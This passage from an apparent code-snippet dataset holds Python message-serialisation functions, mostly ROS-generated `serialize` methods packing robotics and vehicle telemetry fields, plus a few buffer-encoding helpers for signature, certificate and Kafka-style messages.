buffer.append(self.data)", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEd25519SignatureDepA._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_2B2If().pack(_x.role, _x.id, _x.local_time, _x.system_time, _x.voltage))\n buff.write(_get_struct_3f().pack(*self.pos_3d))\n buff.write(_get_struct_3f().pack(*self.eop_3d))\n buff.write(_get_struct_3f().pack(*self.vel_3d))\n buff.write(_get_struct_3f().pack(*self.angle_3d))\n buff.write(_get_struct_4f().pack(*self.quaternion))\n buff.write(_get_struct_3f().pack(*self.imu_gyro_3d))\n buff.write(_get_struct_3f().pack(*self.imu_acc_3d))\n length = len(self.nodes)\n buff.write(_struct_I.pack(length))\n for val1 in self.nodes:\n _x = val1\n buff.write(_get_struct_2B3f().pack(_x.role, _x.id, _x.dis, _x.fp_rssi, _x.rx_rssi))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" 
% (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.cmd\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.cat\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEcdsaSignatureDepB._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_ihih3i3d2i2d().pack(_x.originId, _x.originType, _x.destinationId, _x.destinationType, _x.range, _x.ts, _x.seq, _x.rxPower, _x.channel, _x.datarate, _x.prf, _x.preambleLength, _x.txGain, _x.angle))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgCertificateChain._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_12B.pack(_x.hlive, _x.hstate, _x.hfinished, _x.pressure, _x.c1, _x.c2, _x.c3, _x.c4, _x.c5, _x.c6, _x.c7, _x.c8))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_ih2B().pack(_x.rcvTOW, _x.week, _x.numSV, _x.reserved1))\n length = len(self.sv)\n buff.write(_struct_I.pack(length))\n for val1 in self.sv:\n _x = val1\n buff.write(_get_struct_2dfB2bB().pack(_x.cpMes, _x.prMes, _x.doMes, _x.sv, _x.mesQI, _x.cno, _x.lli))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_2ib6d12B().pack(_x.Timestamp_sec, _x.Timestamp_nsec, _x.IdModulo, _x.InputVolA, _x.InputVolB, _x.InputCorrA, _x.InputCorrB, _x.OutputAnlg1, _x.OutputAnlg2, _x.InputDig1, 
_x.InputDig2, _x.InputDig3, _x.InputDig4, _x.OutputDig1, _x.OutputDig2, _x.OutputDig3, _x.OutputDig4, _x.OutputDig5, _x.OutputDig6, _x.OutputDig7, _x.OutputDig8))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_i3I().pack(_x.messageID, _x.localStamp.header.seq, _x.localStamp.header.stamp.secs, _x.localStamp.header.stamp.nsecs))\n _x = self.localStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.localStamp.time, _x.localStamp.lat, _x.localStamp.lng, _x.localStamp.height))\n buff.write(_get_struct_3d().pack(*self.localStamp.position))\n buff.write(_get_struct_3d().pack(*self.localStamp.orientation))\n buff.write(_get_struct_3d().pack(*self.localStamp.linearSpeed))\n buff.write(_get_struct_3d().pack(*self.localStamp.angularSpeed))\n _x = self\n buff.write(_get_struct_3I().pack(_x.globalStamp.header.seq, _x.globalStamp.header.stamp.secs, _x.globalStamp.header.stamp.nsecs))\n _x = self.globalStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.globalStamp.time, _x.globalStamp.lat, _x.globalStamp.lng, _x.globalStamp.height))\n buff.write(_get_struct_3d().pack(*self.globalStamp.position))\n buff.write(_get_struct_3d().pack(*self.globalStamp.orientation))\n buff.write(_get_struct_3d().pack(*self.globalStamp.linearSpeed))\n buff.write(_get_struct_3d().pack(*self.globalStamp.angularSpeed))\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera.header.seq, _x.camera.header.stamp.secs, _x.camera.header.stamp.nsecs))\n _x = self.camera.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_i3I().pack(_x.camera.messageID, _x.camera.localStamp.header.seq, _x.camera.localStamp.header.stamp.secs, _x.camera.localStamp.header.stamp.nsecs))\n _x = self.camera.localStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera.localStamp.time, _x.camera.localStamp.lat, _x.camera.localStamp.lng, _x.camera.localStamp.height))\n buff.write(_get_struct_3d().pack(*self.camera.localStamp.position))\n buff.write(_get_struct_3d().pack(*self.camera.localStamp.orientation))\n buff.write(_get_struct_3d().pack(*self.camera.localStamp.linearSpeed))\n buff.write(_get_struct_3d().pack(*self.camera.localStamp.angularSpeed))\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera.globalStamp.header.seq, _x.camera.globalStamp.header.stamp.secs, 
_x.camera.globalStamp.header.stamp.nsecs))\n _x = self.camera.globalStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera.globalStamp.time, _x.camera.globalStamp.lat, _x.camera.globalStamp.lng, _x.camera.globalStamp.height))\n buff.write(_get_struct_3d().pack(*self.camera.globalStamp.position))\n buff.write(_get_struct_3d().pack(*self.camera.globalStamp.orientation))\n buff.write(_get_struct_3d().pack(*self.camera.globalStamp.linearSpeed))\n buff.write(_get_struct_3d().pack(*self.camera.globalStamp.angularSpeed))\n _x = self\n buff.write(_get_struct_id().pack(_x.camera.camera_numobstacles, _x.camera.VehSpeed))\n for val1 in self.camera_obj:\n _v1 = val1.header\n buff.write(_get_struct_I().pack(_v1.seq))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_i().pack(val1.messageID))\n _v3 = val1.localStamp\n _v4 = _v3.header\n buff.write(_get_struct_I().pack(_v4.seq))\n _v5 = _v4.stamp\n _x = _v5\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v4.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v3\n buff.write(_get_struct_4d().pack(_x.time, _x.lat, _x.lng, _x.height))\n buff.write(_get_struct_3d().pack(*_v3.position))\n buff.write(_get_struct_3d().pack(*_v3.orientation))\n buff.write(_get_struct_3d().pack(*_v3.linearSpeed))\n buff.write(_get_struct_3d().pack(*_v3.angularSpeed))\n _v6 = val1.globalStamp\n _v7 = _v6.header\n buff.write(_get_struct_I().pack(_v7.seq))\n _v8 = _v7.stamp\n _x = _v8\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v7.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v6\n buff.write(_get_struct_4d().pack(_x.time, _x.lat, _x.lng, _x.height))\n buff.write(_get_struct_3d().pack(*_v6.position))\n buff.write(_get_struct_3d().pack(*_v6.orientation))\n buff.write(_get_struct_3d().pack(*_v6.linearSpeed))\n buff.write(_get_struct_3d().pack(*_v6.angularSpeed))\n _x = val1\n buff.write(_get_struct_i2d6i3d3i2d2ididid().pack(_x.camera_obstacle_id, _x.camera_obstacleposx, _x.camera_obstacleposy, _x.blinkerInfo, _x.cut_in_and_out, _x.obstacle_type, _x.obstacle_status, _x.obstacle_valid, _x.obstacles_brake_lights, _x.obstacle_length, _x.obstacle_width, _x.obstacles_velx, _x.obstacleAge, _x.obstacleLane, _x.CIPVFlag, _x.RadarPosX, _x.RadarVelX, _x.RadarMatchConfidence, _x.MatcheRadarID, _x.obstacleAngleRate, _x.obstacles_velY, _x.object_Accel_X, _x.obstacleReplaced, _x.obstacleAngle))\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera_lane.header.seq, _x.camera_lane.header.stamp.secs, _x.camera_lane.header.stamp.nsecs))\n _x = self.camera_lane.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_i3I().pack(_x.camera_lane.messageID, _x.camera_lane.localStamp.header.seq, _x.camera_lane.localStamp.header.stamp.secs, 
_x.camera_lane.localStamp.header.stamp.nsecs))\n _x = self.camera_lane.localStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera_lane.localStamp.time, _x.camera_lane.localStamp.lat, _x.camera_lane.localStamp.lng, _x.camera_lane.localStamp.height))\n buff.write(_get_struct_3d().pack(*self.camera_lane.localStamp.position))\n buff.write(_get_struct_3d().pack(*self.camera_lane.localStamp.orientation))\n buff.write(_get_struct_3d().pack(*self.camera_lane.localStamp.linearSpeed))\n buff.write(_get_struct_3d().pack(*self.camera_lane.localStamp.angularSpeed))\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera_lane.globalStamp.header.seq, _x.camera_lane.globalStamp.header.stamp.secs, _x.camera_lane.globalStamp.header.stamp.nsecs))\n _x = self.camera_lane.globalStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera_lane.globalStamp.time, _x.camera_lane.globalStamp.lat, _x.camera_lane.globalStamp.lng, _x.camera_lane.globalStamp.height))\n buff.write(_get_struct_3d().pack(*self.camera_lane.globalStamp.position))\n buff.write(_get_struct_3d().pack(*self.camera_lane.globalStamp.orientation))\n buff.write(_get_struct_3d().pack(*self.camera_lane.globalStamp.linearSpeed))\n buff.write(_get_struct_3d().pack(*self.camera_lane.globalStamp.angularSpeed))\n _x = self\n buff.write(_get_struct_2i3did19i3did21i3did7i3did7i4di().pack(_x.camera_lane.l_numoflaneline, _x.camera_lane.l_lanelineid, _x.camera_lane.l_lanepositon, _x.camera_lane.l_lanecurvature, _x.camera_lane.l_lanecurvaturederivative, _x.camera_lane.l_lane_type, _x.camera_lane.l_heading_angle, _x.camera_lane.l_lane_mark_color, _x.camera_lane.l_laneQuality, _x.camera_lane.l_laneWidthMarking, _x.camera_lane.l_laneViewRangStart, _x.camera_lane.l_laneViewRangEnd, _x.camera_lane.l_laneCrossing, _x.camera_lane.l_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.l_lanePRED_OTHER_SIDE, _x.camera_lane.l_lanePRED_OVERRIDE, _x.camera_lane.l_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.l_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.l_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.l_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.l_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.l_lanePRED_SOURCE_STD, _x.camera_lane.l_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.l_laneTCL, _x.camera_lane.r_numoflaneline, _x.camera_lane.r_lanelineid, _x.camera_lane.r_lanepositon, _x.camera_lane.r_lanecurvature, _x.camera_lane.r_lanecurvaturederivative, _x.camera_lane.r_lane_type, _x.camera_lane.r_heading_angle, _x.camera_lane.r_lane_mark_color, _x.camera_lane.r_laneQuality, _x.camera_lane.r_laneWidthMarking, _x.camera_lane.r_laneViewRangStart, _x.camera_lane.r_laneViewRangEnd, _x.camera_lane.r_laneCrossing, _x.camera_lane.r_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.r_lanePRED_OTHER_SIDE, _x.camera_lane.r_lanePRED_OVERRIDE, _x.camera_lane.r_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.r_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.r_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.r_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.r_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.r_lanePRED_SOURCE_STD, _x.camera_lane.r_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.r_laneTCL, _x.camera_lane.next_l_laneViewRangStart, 
_x.camera_lane.next_l_laneViewRangEnd, _x.camera_lane.next_l_numoflaneline, _x.camera_lane.next_l_lanelineid, _x.camera_lane.next_l_lanepositon, _x.camera_lane.next_l_lanecurvature, _x.camera_lane.next_l_lanecurvaturederivative, _x.camera_lane.next_l_lane_type, _x.camera_lane.next_l_heading_angle, _x.camera_lane.next_l_lane_mark_color, _x.camera_lane.next_l_laneQuality, _x.camera_lane.next_l_laneWidthMarking, _x.camera_lane.next_r_laneViewRangStart, _x.camera_lane.next_r_laneViewRangEnd, _x.camera_lane.next_r_numoflaneline, _x.camera_lane.next_r_lanelineid, _x.camera_lane.next_r_lanepositon, _x.camera_lane.next_r_lanecurvature, _x.camera_lane.next_r_lanecurvaturederivative, _x.camera_lane.next_r_lane_type, _x.camera_lane.next_r_heading_angle, _x.camera_lane.next_r_lane_mark_color, _x.camera_lane.next_r_laneQuality, _x.camera_lane.next_r_laneWidthMarking, _x.camera_lane.highwayConstructionArea, _x.camera_lane.highwayRoadType, _x.camera_lane.highwayHighwayExitRight, _x.camera_lane.highwayHighwayExitLeft, _x.camera_lane.highwayProbabilityLeftLane, _x.camera_lane.highwayProbabilityRightLane, _x.camera_lane.highwayDriving_peed_left_lane, _x.camera_lane.highwayDriving_peed_right_lane, _x.camera_lane.highwayprotocol_version))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.line)\n buff.write(_struct_I.pack(length))\n for val1 in self.line:\n _x = val1\n buff.write(_get_struct_4if().pack(_x.x1, _x.y1, _x.x2, _x.y2, _x.color))\n length = len(self.circle)\n buff.write(_struct_I.pack(length))\n for val1 in self.circle:\n _x = val1\n buff.write(_get_struct_3if().pack(_x.x, _x.y, _x.radius, _x.color))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(self.battery_voltage))\n _x = self.flight_mode_ll\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.state_estimation\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.position_control\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2B2f.pack(_x.serial_interface_enabled, _x.serial_interface_active, _x.flight_time, _x.cpu_load))\n _x = self.motor_status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n 
buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.gps_status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_iBf.pack(_x.gps_num_satellites, _x.have_SSDK_parameters, _x.timesync_offset))\n buff.write(_struct_8H.pack(*self.rc_channel))\n buff.write(_struct_6H.pack(*self.control_axes))\n length = len(self.control_buttons)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *self.control_buttons))\n _x = self\n buff.write(_struct_6d.pack(_x.latitude, _x.longitude, _x.altitude, _x.pressure_height, _x.velocity_x, _x.velocity_y))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_14id2i.pack(_x.lnid, _x.did, _x.blid, _x.flid, _x.bnid, _x.fnid, _x.jct, _x.blid2, _x.blid3, _x.blid4, _x.flid2, _x.flid3, _x.flid4, _x.clossid, _x.span, _x.lcnt, _x.lno))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_2I2d4fh2B.pack(_x.date, _x.time, _x.longitude_RTK, _x.latitude_RTK, _x.height_above_sea_RTK, _x.velocity_north, _x.velocity_east, _x.velocity_ground, _x.yaw, _x.position_flag, _x.yaw_flag))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_h16fh8f().pack(_x.id, _x.age, _x.velocidad_relativa_x, _x.velocidad_relativa_y, _x.velocidad_absoluta_x, _x.velocidad_absoluta_y, _x.velocidad_absoluta_sigma_x, _x.velocidad_absoluta_sigma_y, _x.bounding_box_centro_x, _x.bounding_box_centro_y, _x.bounding_box_largo, _x.bounding_box_ancho, _x.object_box_centro_x, _x.object_box_centro_y, _x.object_box_orientacion, _x.object_box_size_x, _x.object_box_size_y, _x.clasificacion, _x.clasificacion_age, _x.clasificacion_certeza, _x.punto_cercano_x, _x.punto_cercano_y, _x.punto_referencia_x, _x.punto_referencia_y, _x.punto_referencia_sigma_x, _x.punto_referencia_sigma_y))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_6d2IB().pack(_x.position.x, _x.position.y, _x.position.z, _x.position.roll, _x.position.pitch, _x.position.yaw, _x.position.stamp.secs, _x.position.stamp.nsecs, _x.is_Known))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _encode_message(cls, message):\n if message.magic == 0:\n msg = b''.join([\n struct.pack('>BB', message.magic, 
message.attributes),\n write_int_string(message.key),\n write_int_string(message.value)\n ])\n crc = crc32(msg)\n msg = struct.pack('>i%ds' % len(msg), crc, msg)\n else:\n raise ProtocolError(\"Unexpected magic number: %d\" % message.magic)\n return msg", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEd25519CertificateDep._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self, data):", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgCertificateChainDep._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def read_buffer(self):\n message=self._message\n return message", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(self.actors)\n buff.write(_struct_I.pack(length))\n for val1 in self.actors:\n _v1 = val1.header\n _x = _v1.seq\n buff.write(_get_struct_I().pack(_x))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = val1.tracking_id\n buff.write(_get_struct_I().pack(_x))\n _v3 = val1.pose\n _v4 = _v3.pose\n _v5 = _v4.position\n _x = _v5\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _v6 = _v4.orientation\n _x = _v6\n buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))\n buff.write(_get_struct_36d().pack(*_v3.covariance))\n if len(val1.points) != 18:\n self._check_types(ValueError(\"Expecting %s items but found %s when writing '%s'\" % (18, len(val1.points), 'val1.points')))\n for val2 in val1.points:\n _v7 = val2.point\n _x = _v7\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _x = val2.confidence\n buff.write(_get_struct_f().pack(_x))\n _v8 = val1.nose_point\n _x = _v8\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n buff.write(_get_struct_b().pack(self.error))\n length = len(self.start_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *self.start_pos))\n length = len(self.target_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *self.target_pos))\n length = len(self.plans)\n buff.write(_struct_I.pack(length))\n for val1 in self.plans:\n _x = val1.joint\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.trajectory)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n 
buff.write(struct.pack(pattern, *val1.trajectory))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.polygons)\n buff.write(_struct_I.pack(length))\n for val1 in self.polygons:\n _v1 = val1.stamp\n _x = _v1\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n buff.write(_struct_I.pack(val1.ID))\n buff.write(_struct_6f.pack(*val1.parameter))\n length = len(val1.score)\n buff.write(_struct_I.pack(length))\n for val2 in val1.score:\n _x = val2\n buff.write(_struct_If.pack(_x.ID, _x.prob))\n length = len(val1.polyline)\n buff.write(_struct_I.pack(length))\n for val2 in val1.polyline:\n _x = val2\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.edge_prob))\n length = len(val1.features)\n buff.write(_struct_I.pack(length))\n for val2 in val1.features:\n _x = val2\n buff.write(_struct_3fI.pack(_x.x, _x.y, _x.z, _x.ID))\n _x = val1.energy\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.weight))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self.tsp_turtles\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.conveyor_turtle\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.catch_turtle\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n buff.write(_struct_d.pack(self.i))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % 